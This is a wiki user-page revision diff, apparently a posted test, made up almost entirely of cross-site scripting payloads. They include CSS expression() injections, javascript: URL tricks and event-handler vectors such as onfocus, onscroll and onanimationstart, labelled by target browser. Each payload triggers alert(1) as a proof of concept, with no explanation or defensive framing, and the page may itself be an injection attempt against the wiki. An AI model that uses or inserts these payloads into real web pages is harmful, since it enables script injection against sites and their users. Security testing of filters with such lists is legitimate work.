User:Loveme5454/test.gif View history

Revision as of 19:22, 25 May 2018

XXX

<// style=x:expression\28javascript:alert(1)\29> <style>*{x:ｅｘｐｒｅｓｓｉｏｎ(javascript:alert(1))}</style>

@@ Line 4: / Line 4: @@
 <DIV STYLE="width: expression();">
 <DIV STYLE="background-image: url(&#1;javascript:)">
+<div onbeforescriptexecute="alert(1)"></div>
+<div onfocus="alert(1)" contenteditable tabindex="0" id="xss"></div>
+<div style="-webkit-user-modify:read-write" onfocus="alert(1)" id="xss">
+<div style="-webkit-user-modify:read-write-plaintext-only" onfocus="alert(1)" id="xss">
+#MSIE10/11 & Edge
+<div style="-ms-scroll-limit:1px;overflow:scroll;width:1px" onscroll="alert(1)">
+#MSIE10
+<div contenteditable onresize="alert(1)"></div>
+# MSIE11
+<div onactivate="alert(1)" id="xss" style="overflow:scroll"></div>
+<div onfocus="alert(1)" id="xss" style="display:table">
+<div id="xss" style="-ms-block-progression:bt" onfocus="alert(1)">
+<div id="xss" style="-ms-layout-flow:vertical-ideographic" onfocus="alert(1)">
+<div id="xss" style="float:left" onfocus="alert(1)">
+# Chrome, Opera, Safari
+<style>@keyframes x{}</style>
+<div style="animation-name:x" onanimationstart="alert(1)"></div>
+# Chrome, Opera, Safari
+<style>
+div {width: 100px;}
+div:target {width: 200px;}
+</style>
+<div id="xss" onwebkittransitionend="alert(1)" style="-webkit-transition: width .1s;"></div>
+# Safari
+<div style="overflow:-webkit-marquee" onscroll="alert(1)"></div>
 <div><iframe src=x>
 <// style=x:expression\28javascript:alert(1)\29>
 <style>*{x:ｅｘｐｒｅｓｓｉｏｎ(javascript:alert(1))}</style>